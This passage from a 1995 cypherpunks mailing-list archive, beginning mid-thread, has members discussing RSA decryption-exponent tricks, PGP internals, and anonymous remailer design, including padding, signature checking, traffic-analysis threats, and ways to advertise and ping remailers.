>         Let k = 0's in n1/0x10001.
>         If k is in range, save and exit.
>       }
>     EndIf
>  EndIf
> Next
> n1 += 0x10001;
> EndLoop
>  
> Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
> (x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  
>  
> ie: ed = (p-1)*i+1
> or: (ed - 1) / i + 1 = p
>  
> Now 0x10001 inverts easily, it is just n1/0x10001.  By keeping track of
> various quantities, we can eliminate all multiprecision divisions except
> for the original one needed to get n1 and the t's, and doing increments
> instead.

I still don't follow this.  Is k claimed to be d?  Where do we verify
that ed=1 mod (p-1)?  ed would be n1, right?  When you said "If (n1-1)/i
+ 1 is prime" did you mean "is p"?  I really don't think this whole thing
works.

Let me tell you what I tried.  I inverted e to get a correct d.  Then I
looked at different d's to find one with lots of 0's.  This turned out
to be useless!  The reasons is that PGP does not use d.  It uses the
Chinese Remainder Theorem to do its exponentiation.  The two
exponentiations it does use exponents d mod (p-1) and d mod (q-1).
Adding multiples of phi to d does not change these values (since it is
a multiple of both p-1 and q-1).

Now one thing you could do is to use in place of d mod (p-1),
(d mod (p-1)) + k*(p-1) where we choose k to minimize the sum of the number
of bits and the number of 1 bits in this expression.  Unfortunately the
PGP data structures do not store d mod (p-1), it is constructed on the
fly when you do a decryption.  So there is no where to save a
pre-computed optimal value for the two exponents used in the CRT
exponentiations.  So, this was a good idea, but the implementation does
not fit into the current structure very well.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzA/mhnMLJtOy9MBAQEjmAIAzQbwkia3F7+4F7tNUewKnZVYsBEhgoBk
h5jem/qjUxFeGhYNUL/pSLKJPR+PlzleZmBQJyOlk3q7KL0ety851g==
=EHVe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Wed, 1 Feb 95 10:59:25 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: The security characteristics of crypto modules withsecrets
In-Reply-To: <199502011528.KAA23229@crypto.com>
Message-ID: <3573AD49>
MIME-Version: 1.0
Content-Type: text


Matt and Cypherpunks, etal.

I have been designing secure crypto modules for many years.  The
primary difficulty has been getting anyone to shell out the money to
buy them.  Perhaps things will be different with PC Cards.

Peace. Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 16:58:23 PST
To: cypherpunks@toad.com
Subject: Lucky primes & omlets on my face...
Message-ID: <Pine.3.89.9502011814.A8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
Considering the general temperature of this list, I'm amazed that I didn't
get torched over my algorithm.  sigh.  The c-punks are all too busy
debating operating systems to worry about effiency in their remailers.
 
Unless, of course, Hal's "I don't understand" was from the Moore school?
 
Let's try this again.
 
Let 2*x be the target number of bits in the modulous.
 
Let n be a large random number with x+2 digits.
Let n1 be the next multiple of 0x10001.
Let t2 be n1 mod 8, t3 be n1 mod 9, t5 be n1 mod 25, t7 be n1 mod 49.
 
Loop:
For i = 2 to 7
 If n1 = 1 mod i and (n1-1)/i + 1 is not a multiple of {2,3,5,7}
    If (n1-1)/i + 1  is prime.
      {
        Let k = 0's in n1/0x10001.
        If k is in range, save and exit.
      }
    EndIf
 EndIf
Next
n1 += 0x10001;
EndLoop
 
Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
(x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  
 
ie: ed = (p-1)*i+1
or: (ed - 1) / i + 1 = p
 
Now 0x10001 inverts easily, it is just n1/0x10001.  By keeping track of
various quantities, we can eliminate all multiprecision divisions except
for the original one needed to get n1 and the t's, and doing increments
instead.
 
>Yes, I see that you are right about this.  It would be easy to generate
>e,d pairs and get a d which is significantly short on 1's by 10% or more.
>I did not quite follow your algorithm to do this (was n the modulus or
>was it phi, the sum of the modulus' divisors?).  The one caveat is that
>if "high-zero" decryption exponents are widely used, it could conceivably
>reduce the search space somehow, although I don't see offhand how to
>exploit this.
>
>Hal
 
>>     (you may wish to ensure that k is _above_ a certain threshhold...)
 
I don't either, but if >80% of the digits were 0, I'ld probably start to
get nervous.  But I don't need a fast-key for my home system, I'm barely
handing 10 signatures a day.  I only advocate using high 0's when you are
in a high usage environment.
 
Nathan
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLzA2NnmgMs8UcStNAQEyjQf/aOPBXcN6/M9cmh3aQHXeIr5uY3DEwvRw
WHBtWv0dVE1jfSS/4i71apWi2+Gm7iRyLGc/G4Y03RkcqMhePGSHgN6NHEHC3QaR
qoKMsa/h6z5nSMd/t8umTiSUJxFX2/1z8k29j7bM5gduUTqHPdFwcVnQnE8Rhy72
hwF+r3g9lFIhavsLFnT7KPeQ1ozVFJ+ItoTDWOOjjA8/MSGFi5JFkViw+saP2F/j
2JEbMhmMcjtTchu+s/yNVGJeL0C0DMjh2Ysh/wS/GwbcoXK1RFb602lXtCp2AUz5
Mzn9Xsdv4bUyyoumN5wT6YDdwu6QwvvU5Fh9sTZUwFHsY9RrMy53jQ==
=lK0s
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 16:59:39 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9502011857.B8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal <hfinney@shell.portal.com>
 
>I still don't quite follow this. 
 
Clearly.  ;)
 
Okay.  You are right that the first remailer derives no primary benefit,
and engages in no primary risks from verifying signatures.  Alice, however
does, and Chaum is, after all, providing a service to Alice (and Frank).
He does wish to provide all the benefits that he can to them.
 
What benefit does Alice gain?
1) Plausible deniability.  Remember, "reasonable doubt."  Remember Abscam?
   The gov't is in a good position to fake source info.  This squishes
   that.  (It squishes even better if Chaum _requires_ signatures.)
 
2) If Chaum sends Alice a copy of the message that failed the signature
   check, Alice knows that someone is trying to spoof her.  This
   information may be critical in determining how serious her opponents
   are.
 
What risks does Alice take?
If the final message to Bob is encrypted, and Chaum is not compromised,
none.  If Chaum _is_ compromised, Alice is chaining anyway, so it still
doesn't matter.
 
What might Chaum gain from checking or requiring signatures?
Various net abuses often involve faking names.  Requiring validated
signatures would pressure these abuses away from the remailers.  Reducing
the net abuses going through the remailers is a PR goal.
 
 
>PGP already includes a cryptographically protected length field in the
>message.  It will ignore any data past that, according to my experiments.
>All that is needed is a simple patch to add junk data to the end.
 
Soapbox mode:
It seems to me that hacking PGP requires considerably more cooperation
between remailers, and more work than just allowing recursive opening of
PGP packets, automatic padding (or concatenating) of data, and automatic
encryption of out-goin mail. Subways and MixMaster both appear to have far
more working required to implement, far more cooperation between remailers,
and far more room for failure than my idea.  (Emphasis: appear.  I've not
seen Lance's paper, yet.  He's getting it to me.)
 
I also believe that hacking PGP is a bad thing (tm), because it means that
every time an upgrade comes out, it will need to be re-hacked, and once you
start hacking, when do you stop?  Although, it would be nice to have a
STD_LEN variable for such things.
 
 
OTOH, you seem to be agreeing with me here.  Who hacks PGP?  Who is PGPing
their outgoing stuff?  Don't we have to have standard packet _inside_ the
net?  And you achieve this by using PGP?  ?????
 
 
>I still don't quite follow this.  Exactly what attack would be possible
>against Miron's remailer if it allowed encrypted reply blocks (as all
>others do) which would fail if the messages were wrapped as you suggest?
 
The most obvious one: Eve checks messages (in vs out) for matching tails.
If the tails match, the messages match.  The only way around this is for
the entire message to be wrapped.  Thus, the extropian requirement.  
 
 
When I say that the Mark I remailers are laughably easy to crack, I mean
laughably easy.
 
Is the message a clear set of ::Request-Remail-To:?  Pull & log.
Is the message clear, with encrypted headers?  Match, pull, and log.
Is the message encrypted separately from the headers?  Match, pull, log.
Is the whole message encrypted?  Take the ones that are left, match the
largest.  Match the next largest.  Match the next largest. Pull & log.
 
Get stuck?  Need a hint?  Resend a message.  Watch for the repeat on the
out.
 
Laugh.
 
 
The only reason that our systems are actually able to do any good is that
our threat model _is not_ an LEA--with government resources, and government
patience.
 
 
>Alice may not have a key whe wants the general public to use - she may
>just be using one for her private correspondents.  
 
If she wants to be able to recieve untraceable mail, she is going to have
to have a key that remailers can use when forwarding mail to her.  See
below.
 
>                                                  Actually it seems to
>me given the nature of remailing that it would be superior if it were
>easy for people to "spoof" my use of the remailer.  That would give me
>more credence to claim innocence.  The more useless return addresses are,
>the less we even need remailers.
 
I think you are arguing to ignorance here.  The assumption so far on the
list has been that if Alice is root, she is in the best possible postion to
protect herself.  I disagree.
 
Alice has been hauled into court.  The Feds claim that she is the one that
actually sent messages M1,...Mx to Bob through Chaum, even though these
messages have varied From: (and From) lines.  As root, she cannot claim
that this is not possible.  OTOH, if Chaum requires a match, the Feds would
have to claim that she compromised the secret keys of all of all the
cooresponding From: addresses.  Much tougher.
 
 
>It's not my job to fix the damn Internet.  So what if I get mail claiming
>to be from abc when it's actually from def?  I of all people care the
>least, specifically because I throw away this data.  Virtually everyone
>else on the net cares where their mail comes from, but I don't.  My whole
>purpose is to discard the information about where it comes from.  That is
>why I am so confused about your emphasis on checking signatures.
 
We care because we are good people.  ;-)
 
Seriously, if a sight is being shadowed, then it is insecure.  It is to our
advantage to know this.  You are right that we "don't care" where a message
comes from only if we assume that the message _didn't_ come from an LEA.
(Or a big corporation.  Some of them probably have the power to do this,
too.)  If it did, then the remailer net is under attack, and we most
definitely _do_ care about that.
 
 
>Although I agree with Wei Dai's mathematics, to my mind it points up the
>importance of successful countermeasures rather than implying that the
>remailer network is inherently insecure.  For example, if you send one
>identical message every batch, Wei's math shows clearly that you can't be
>traced.  Let's not get rumors started about how the remailers don't
>work.
 
I'm lost here.  I thought that sending an identical message (producing
identical output) every tick would be the equivalent to an attack.
 
But what exactly constitutes "successful countermeasures"?  How do you
prevent an attacker from taking over a sight, thus compromising it, w/o
the knowlege of the operator?  How do you prevent long/short matching of
the remailer net _as a whole_?  How do you prevent tail matching?  How do
you prevent middle matching, for that matter?  How do you prevent the
repeated message attack?
 
 
>Do you see your suggestion as protecting against Wei's in/out correlation
>attack?  
 
Yes!  Well, not by itself.  My suggestions about "rational use of garbage"
do that.  If Bob recieves x messages each tick, 0 to x of which are real,
Eve is hosed--if all messages are standard sized & encrypted!.  Eve is even
more hosed if the x messages are concatenated & superencrypted.  If Alice
sends y messages each tick, Eve is hosed.  Even more so if the messages are
concatenated & superencrypted.
 
>        I don't see it.  If fixed-sized packets are used, with chained
>encryption, I think you have as good a system as you do with all of your
>inter-node encryption and signing.
>
 
The way you suggest to standardize packet sizes leaves the system
vulnerable to matching the top of the body of the messages in a repeated-
message attack.
 
>Suppose one good encrypted message enters the net with 10 unencrypted
>ones.  Won't the full path of each of the 10 be visible to an outsider?
>Even if the remailer helps out those 10 doltish users by encrypting them
>from there on out, the outsider already saw their whole paths!  They will
>know how many unencrypted messages are going out to each destination, and
>from that determine where the encrypted message is going.
 
Not with rational use of garbage.  With rational use of garbage, the system
could protect a single encrypted message--if the recipient or sender is "in
the box".  BTW, it may be impractical for senders to be "in the box", as
described, as they cannot know exactly when ticks occur.  I believe it can
be done, though.
 
>Of course it was Chaum himself in his 1981 paper (which I think is available
>from the CP FTP site) who described the duplicate-message attack.  I don't
>see that inter-remailing encryption helps much, because the attacker can
>still notice that whenever they inject message A, _something_ goes to
>Bob.  The real solution, as Chaum pointed out, is that the remailer must
>reject duplicate messages, even when separated by days.  Doing this without
>keeping a database of all messages ever sent is left as an exercise.
>
 
I disagree.  If identical input to Chaum does not produce identical output
to Bob, how does Eve coorelate them?  Repeating, she can match the top of
the body of messages, so random tails reveal the actual encrypted message,
for whatever that is worth.
 
And if Bob receivs x packets per tick, or a BIG packet every tick, how does
Eve trace it?
 
 
>Another aspect worth mentioning is that message splitting can make the
>kinds of statistical correlations that Wei Dai was looking at more of
>a danger. 
 
More than being the ONLY file in the net of your (approximate) size?
 
>          It's one thing if I send a message along with thousands of
>other people, and Bob gets a message along with everyone else.  But if I
>send 10 messages and Bob gets 10 from that batch, that fact alone can
>help to link us up.  So splitting my big message into 10 standard ones
>isn't that great if they're all sent at once.  Ideally you'd want to
>dribble them out at some standard rate, a rate at which you always send
>a message whether you have something to send or not.  But this may introduce
>unacceptable latency.
 
"Dribble them out at some standard rate".  Yes.  y packets per tick.  Set y
equal to your average number of real packets per tick, plus 3 standard
deviations.  Since you are chaining, the latency of you input will be less
than the latency of the remailernet.
 
Nathan
 
"PGP?"                        "ITAR!"                          "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 17:00:02 PST
To: cypherpunks@toad.com
Subject: Ending the Crusade
Message-ID: <Pine.3.89.9502011825.C8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an idea to tone down the dos crusade for those of you with procmail
and a vindictive streak:  Instead of routing all of those messages to
/dev/null, forward them back to the authors, perhaps with a notice that the
message appears to have been mistakenly routed to you?
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 1 Feb 95 17:00:35 PST
To: cypherpunks@toad.com
Subject: Thanks for not flaming  !??!?
Message-ID: <Pine.3.89.9502011858.D8923-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu>
 
>YOu're right, I did miss the attack.  I'll be responding in depth
>tomorow, when I'm awake, but I wanted to say thanks for not flaming.
>:)
>
>Adam
 
Is it just me, or does this message have a rather disturbing social
implication?  Crimeny, no one's perfect around here.  Well, maybe James or
Perry.
 
Nathan
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 1 Feb 95 16:29:32 PST
To: cypherpunks@toad.com
Subject: Re: Fundamental Question?
Message-ID: <199502020025.TAA15949@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9502012323.AA00271@toad.com>,  <kevin@elvis.wicat.com> wrote:
>Consider the incoming directory on my local news host:
...
Strictly speaking, you've really only demonstrated
that there are a lot of poorly connected sites on the USENET.  The
primary characteristic that really needs to be considered is the time
for news to reach one remailer site from another.

My experience is that new propogation is fast enough that close to
real-time conversations happen all the time.  I take part in them on
the newsgroups I still read and observe them all the time.

I don't have a ready explanation for why my experience differs so much
from yours.  The worst-connected site I've ever read from was 9 mo.s ago
with a batched feed from uunet.  Even then the vast majority of posts I
saw were from the day just ending.

What are other people seeing as news delays?
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzAmeSoZzwIn1bdtAQHHiwGAxL13i5YYjZxREU1XwnAp81+XWgir7H92
enbDeqFQwjddTeEgHX+fKZWoZJBe4wy6
=pmE5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 1 Feb 95 16:53:34 PST
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: PGP Question
In-Reply-To: <9502011343.AA00578@elysion.iaks.ira.uka.de>
Message-ID: <199502020053.TAA06783@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Is there any simple way to glue a binary file and its detached pgp
> signature together into a single pgp file (as produced by non-detached
> signing) ?

Uhh, this would sort of defeat the purpose of a detached signature; in
which case why not use the regular signature??  Alternatively, you
could use MIME multiparts to encode the binary file (in one part) and
the signature (in another part) in a single message.  Is this what
you want???

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Wed, 1 Feb 95 17:03:28 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <199502020059.TAA16283@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9502020017.AA00895@toad.com>,  <kevin@elvis.wicat.com> wrote:
>>1.  Broadcasting every couple of minutes isn't necessary and is undesirable

>True, but this has two basic assumptions that I disagree with: first,
>that we can guarantee delivery of a broadcast message to all interested
>sites; 

I had the USENET model of propogation in mind when I wrote this.  Delivery
is considerably better assured with such a store-and-forward over

>and second, that remailers never go down for unexpected reasons.

True, if you append "for extended periods of time."  The key detail is the
boundary condition: IE, how long does it take a "downed" remailer to come
off the web.  Since each site has the best idea of their own stability,
they are in the best position to set the time-out period.  A very flaky
site might set a time-out to 6 hours.  I'd suggest that a site flakier
than that shouldn't be running a remailer.

>>2.  This is actually unnecessary for your situation: All you need to do is
>>advertise your location as a "real" remailer and then have a cron job that
>>kill sendmail at 5pm on your remailer machine

>But, if my understanding of remailer operation is correct, this has two
>potential problems: first, I will still receive mail during the day,
>causing a bandwidth concern (I know, it's probably not a problem right
>now, particularly since users will probably choose to avoid a remailer
>with a possible 16 hour delay);

No, not at all.  The attempted connections to your sendmail with fail and
the mail will attempt redilvery for some period of time (usually 3 days) 
at a certain interval (usually 30min. - 1 hour).

>And even if I try to be nice
>when the mailer goes down permanently and tell everyone not to route
>mail through it any more, that news still has to travel via word of
>mouth to all users of the web.

Sure.  It's important to note that you've got two seperable problems to
address here: 1) a recurring limited window of up-time, and 2) handling
permanent down-times.

My suggestion only covers the first.  The USENET model I'm pushing is
designed to cover the second.

>[PGP web-of-trust] strikes me as critical;...
>Given an extended web of trust between remailers, the user can
>choose to trust one remailer (I have no idea how to make this process
>more palatable) and immediately gain the security of a large web of
>remailers. 

Absolutely, that's what I was trying to express.

Best regards,
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy/1gRNhgovrPB7dAQGZCQQA47ADvvuXRvlq5Qw3MSZaUJqqk2KJbUKk
nV1mnTVIbvBbCt5PczoSFKkO/O6wMfS/4zzkoTqpvpIvwYvZ6ds75yBwhIyxvTvx
gygKFi5ZwysYGz/49vs0BdJSHMqUA+/HVHE2zfcYP+yvbnbTdryQJXLrOdlGhH3a
R0LvGJVgCSw=
=k+vP
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzAuayoZzwIn1bdtAQFa4gF8Cl9yuHttaTqmcy9Be+9EWa4qp3zHCP5n
pgWiNvOt7reobq42ZluxFgTlWrFG0SKa
=oFTV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 1 Feb 95 18:21:10 PST
To: Nathan Zook <nzook@bga.com>
Subject: Re: Ending the Crusade
In-Reply-To: <Pine.3.89.9502011825.C8923-0100000@jake.bga.com>
Message-ID: <9502020220.AA18342@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 1 Feb 1995 18:59:54 -0600 (CST)
    From: Nathan Zook <nzook@bga.com>
    
    Instead of routing all of those messages to /dev/null, forward
    them back to the authors, perhaps with a notice that the message
    appears to have been mistakenly routed to you?

And then all LD has to do to have lots-o-fun is to send you a whole
bunch of "your OS sucks" messages with the From: line set to
alt.religion.scientology@some.mail2news.site . . . .

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 1 Feb 95 18:19:09 PST
To: cypherpunks@toad.com
Subject: Frothing remailers, the advertising and pinging problems
Message-ID: <ab55e6d7010210043e93@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 PM 02/01/95, kevin@elvis.wicat.com wrote:
>I am not happy with my proposed advertising methods, and was quietly
>hoping for some guidance from internet gurus in this point (the irc
>suggestion in particular is a pretty shaky straw man). However, see my
>earlier message (on some other thread) about Usenet propagation times.
>Propagation times in days do not seem to be rare (post to misc.test and
>see when the last reply comes back). While this is better than
>word-of-mouth propagation, it does not offer the very low latency I was
>looking for.

I tried to discuss this very issue a few months ago, with little interest.
But I'm glad there's someone to discuss it with now. (read, someone who
will listen when I spout volumes to the list :)   )

Here follows my treatise. :)


We already have a solution, actually.  Raph's remailer list.  If you know
your remailer is going down, tell Raph about it, and he'll remove you from
the list.  [Better would be an automatic way of removing remailers from the
list upon receiving a PGP-signed message from the op, without Raph's
intervention].  Presumably, if your remailer never returns his ping, it
will move to the bottom of his list.  So applications like his "premail",
which use this list, won't send to those remailers.

This is really an excellent solution, and what it doesn't do, could easily
be added to it.  The problem is that it's too centralized. We like
decentralized things hereabouts, and Raph's list requires you to trust Raph
not to lie to you, or withhold information to you. And of course a
centralized solution is more subject to attack too; if someone mangaged to
subvert Raph's list (either by subverting his data collection methods, or
the report he generates), then an increasingly large portion of the
remailer-using-public is up shit creek.   Single point of failure.

A partial solution is for lots of people to run remailer pinging and
reporting services like Raph's.  Then you could use which ever one you
want, or even write a script to get info from them all and average em
together (throwing out extremely oddball scores, using some sort of
statistical method).  A better solution to the centralization problem would
be for _everyone_ to run their own remailer pinging service.  This solves
the centralization problem, but now when a remailer op knows his remailer
is going down, he can't simply tell Raph, he's got to tell _everyone_,
which is the same problem he had originally.  Also, this is somewhat
realistic.  People have been saying for ages that the remailer net is much
more secure when every user runs their own remailer, but it still hasn't
happened. For obvious reasons.

So we've still got the problem of how users are to tell when remailers go
down.  That's what I see as the basic problem here.   It really divides
into two problems: the "advertising" problem, and the "pinging" problem.
Which actually aren't at all completely seperate.

*THE ADVERTISING PROBLEM*

The advertising problem consists of how remailers are to get info out to
the Remailer-Net-At-Large.  I run a remailer, and I know my remailer is
going out of business soon (temporarily, or permanently), and I want to
tell people.  Or, my remailer has returned (or just started started
business for the first time), and I want to tell people.

        ++Usenet. Non-IP, but slow. ++
Usenet is an obvious solution, but the latency is too low.   But usenet
does work really nicely, aside from the latency problem. Remailers post
messages to alt.remailer.auto-announce, giving one of a number of
standardized machine-readable messages.  For instance FriendlyRemailer
might post that it's going down, and expects to be down for about 24 hours.
Clients, which could be other remailers, or chaining applications like
premail, would periodically check this newsgroup and keep track of info.
My client software might decide to stop routing through FriendlyRemailer,
and completely ignore the "for 24 hours" thing, and start sending through
there again when it gets an "I'm back" message over the usenet.  Or it
might decide to record the "for 24 hours" thing somewhere for human
reading.  If a new remailer appears and broadcasts "I'm here", it might add
it to the list of useable remailers, or it might ignore it, or it might ask
for human approval of adding it to the list. Whatever the user wants it to
do.

        ++Direct TCP.  IP-required, complicated, but fast.++
But there's still a latency problem.  The only way I can think of to solve
that is with direct TCP connections of some kind.  IRC would be one way.
Remailers could broadcast "I'm here" every 20 seconds on an IRC channel,
and clients could keep an eye on this IRC channel to see what's up.  Of
course, then a client would need to wait up to 20 seconds before sending a
piece of mail, which is kind of a pain. So, instead, you might have a
background program running always, and tabulating data, so it's got data
stored and doesn't need to wait at all. (If the remailer said "I'm here" a
minute ago, that's good enough, dont' need to wait another minute for the
next "I'm here").  And then remailers wouldn't need to broadcast as often
as 20 seconds; something like 5 minutes would probably do.  So bandwith is
more reasonable.  If a remailer goes down, and you send a message to it
within 5 minutes, you are shit out of luck, unfortuantely.   The problem
with this solution is that everyone using it needs to be on the internet.
People haven't wanted to exclude UUCP connections and such from
participating in the remailernet (as remailer or client) in the past, and I
think they're probably right.  And IRC might not be that reliable, I don't
know.  And it requires a lot of proccessing power; remailers have got to be
constantly sending out "I'm here", client programs have to be constantly
running and scanning for this info.  Might not be that scalable either,
when you have 100 remailers broadcasting, and 20,000 users listening. Or
more.

*THE PINGING PROBLEM*

The pinging problem consists of how clients (which could be other
remailers) can querry remailers about whether they are up or not. (and what
features the particular remailers support, which is also something that
might be advertised above, incidentally.)  The user is taking the
initiative, as opposed to the remailer.  Because maybe someone subverted
your usenet or IRC or other broadcasting medium, so you don't want to place
too much trust on it, and you want to check it yourself.   And maybe the
"advertising" medium is slow usenet, so you the last "I'm here" you got
from a remailer was a dated day ago. Is it still there? You'd like a quick
way of pinging it to see.

Again, we have two solutions: Slower simpler, being-on-the-net unneccesary,
pinging with mail; and Faster, More Complicated, need-to-be-on-the-net TCP.


        ++Mail ping. Non-IP, simple, slow. ++
 A mail ping simply consists of sending a message to a remailer with a
Request-Resending-To: yourself.  When you get it back, you know the
remailer is alive.  This has the advantage that it's hard for the remailer
to trick you, even if it is an evil NSA remailer that wants you to believe
it is alive, even though it really throws messages in the trash.   It can't
differentuate between your "ping" (to be returned), and a normal message
(to be thrown in the trash).  And you can do it with a UUCP connection, or
some other kind of store-and-forward non-IP connection.  The problem is
that it's slow.  Especially with the latency that secure remailers have to
put into the mix.  This could be solved if you could tell the remailer
somehow that this is a ping message which should be sent relatively quickly
and not re-ordered and latency-added like a normal message. Of course, then
you lose the advantage that the remailer can't tell the difference between
a ping and a normal message.

The way to deal with the high latency, would again be to have each client
have a background process running and pinging periodically, and storing
data.  Again, if it's gone down since your last ping, you are out of luck.
And this is kind of complicated, and high-bandwith.

        ++TCP transaction ping. IP required, complicated, but fast.++
Again, the other alternative is a direct TCP connection. Connect to a
certain port, say "are you there", get an answer.  I believe mixmaster will
soon support direct TCP traffic transactions, it would probably be trivial
to add a "pinging" feature too. Although really unneccesary. If you contact
the host directly, and it answers, you know it's there, you don't need to
ping.  The disadvantage is again that IP is required.


**CONCLUSION**

Advertising and pinging methods are needed.   There should be a way for a
new remailer to announce itself to the net (might not be trusted or used by
software, but it's up to the user), and a way for existing remailers to
announce that they are going down (and announce when they come back up).
There also needs to be a way for a user to "querry" a remailer
individually, instead of relying on advertising, _especially_ if the
advertising method is high-latency.

Both the slower store-and-forward (mail, news) techniques, and the faster
direct-socket-connection techniques both have advantages and disadvantages.
Ideally, _all_ of them would be exist.  Some remailers might only support
or deal with some of them (out of choice or lack of IP connectivity or
bandwith), but client software could gather info from all or some of the
pinging and advertising mediums, and make choices about whether to use
remailers, based on how much info it has, and what the info says.

And the issue not even discussed here, is that of having a succesful way to
bounce messages.  If all of your advertisment-gathering and pinging fail
anyhow, you should be notified that your message didn't make it through. It
actually seems possible that a succesful bounce method would remove the
need for advertising and/or pinging completely.  But a succesful bounce
method seems even more remote then succesful pinging/advertising methods.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 20:00:37 PST
To: ortenzi@interactive.net (Anthony Ortenzi)
Subject: Re: Fundamental Question?
In-Reply-To: <Pine.BSI.3.91.950201135326.29214A-100000@ns.interactive.net>
Message-ID: <199502020400.XAA03916@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anthony Ortenzi wrote:
> 
> Although I understand the need for remailers for anonymity, is it not 
> true that the whole idea of encryption (good encryption, that is) is that 
> no matter who gets the encrypted text, it really doesn't matter?  Does 
> this not mean that something like USENET is *perfect* for this?

Well, it's happened in the past. Doesn't mean Usenet is perfect for it,
since nobody wants to sift through several thousand messages a day for
messages encrypted to him/her.  Also, imagine all the traffic sent to a
remailer duplicated on overy site that carries that Usenet group...

Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Feb 95 23:14:37 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <199502020714.XAA15798@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>
[ Re: remailers checking signatures on incoming messages ]
> What benefit does Alice gain?
> 1) Plausible deniability.  Remember, "reasonable doubt."  Remember Abscam?
>    The gov't is in a good position to fake source info.  This squishes
>    that.  (It squishes even better if Chaum _requires_ signatures.)

She doesn't get that.  A signature lets her prove that she sent a
message.  It doesn't let her prove she didn't send a message.

> 2) If Chaum sends Alice a copy of the message that failed the signature
>    check, Alice knows that someone is trying to spoof her.  This
>    information may be critical in determining how serious her opponents
>    are.

I don't really understand this threat that Alice may be "spoofed".  Why,
of all places, would her opponents try to spoof her through an anonymous
remailer?  Isn't this kind of like sending mail with no return address,
and pretending it comes from someone else?  This seems terribly subtle.

> What might Chaum gain from checking or requiring signatures?
> Various net abuses often involve faking names.  Requiring validated
> signatures would pressure these abuses away from the remailers.  Reducing
> the net abuses going through the remailers is a PR goal.

This would be a good thing, agreed.  And requiring signatures probably
would weed out a lot of the flakes, largely by raising the threshold of
cluefulness needed to use the network.

> It seems to me that hacking PGP requires considerably more cooperation
> between remailers, and more work than just allowing recursive opening of
> PGP packets, automatic padding (or concatenating) of data, and automatic
> encryption of out-goin mail. Subways and MixMaster both appear to have far
